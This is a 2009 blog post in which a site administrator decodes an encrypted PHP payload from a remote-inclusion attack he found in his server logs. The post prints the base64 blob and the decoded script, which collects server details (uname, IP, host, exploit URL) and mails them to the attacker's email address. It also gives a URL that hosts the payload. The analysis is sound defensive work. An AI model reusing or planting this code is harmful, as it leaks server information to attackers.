Apr
11

Some remote exploit analysis

Lawrence Sheed // 11 Apr 2009 // No Comments

Foreword - Note that none of our servers are vulnerable to remote inclusion attacks.

For the most part, most of the exploits I covered in yesterdays post are common garden php vulnerability scans.
Some of them are more interesting though, although more for being encrypted, than anything else.

If I take an example from our log files:

http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt

This returns an encrypted string.
Its fairly easy to see whats been returned in that, merely by changing the eval to an echo.

//Edited slightly for width purposes
$lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXb".
"HNMbU52YlE9PSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9".
"Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRw".
"Oi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFU".
"VVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGl".
"wID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0".
"aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3V".
"iaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIl".
"xuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6".
"ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7D".
"QokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRv".
"b2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCgg".
"JGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZn JvbSk7"; 

//eval(base64_decode($lmge));

//To stop execution, and merely see the script contents we echo it, instead of eval..
echo (base64_decode($lmge));
exit;

This returns this:

$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ=="); 

($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);

So in this case we can see the attacker wants us to email him our server details, what url worked for the exploit, and a few various php details.

If we look at the email account he wants to email to we can see its a google account.

echo base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");   //returns fr33sh3ll@gmail.com

Google has been notified about that account.
All in all, slightly more interesting than the usual!

April 11, 2009   //   Exploits, Technical Mumbo Jumbo   //   No Comments   //   Tags: , , ,

Post comment

Archives

Categories

Most Popular Posts

Tags

adsl Apache Apple arm7 bmw china china telecom Chinese Spyware Removal Howto coffee cool debian disassembly dns firmware foscam Google government hacking hardware how to howto icp ipcam iPhone Kitto krups licence Mac miibeian mini3i nc745 nespresso nuvoton ophone outage problem Replace shanghai spam taobao Thoughts Time Machine Tuning uclinux video

Recent Comments

  • tryphon: It helped me to fix mine. I used a pair of pliers like you did and it worked fine. I drink a coffee typing...
  • mark: I have a ms10105 v4.1 moshisoft board and here is the pinout: 1 y stepper a (yellow) 2 y stepper a (white) 3...
  • Lawrence Sheed: Haven’t taken a deep look yet, probably next month can check it out. There are people who are...
  • mark: Yes…that moshi software is crap. I used the corel draw plugin for awhile but it only works about 20% of...
  • Kunlun: I tried to get my motorbike lesson after my car driving lesson, they answered me that I needed to wait 1...

Recent Trackbacks

PHOTOSTREAM

CNC on the desk at the factory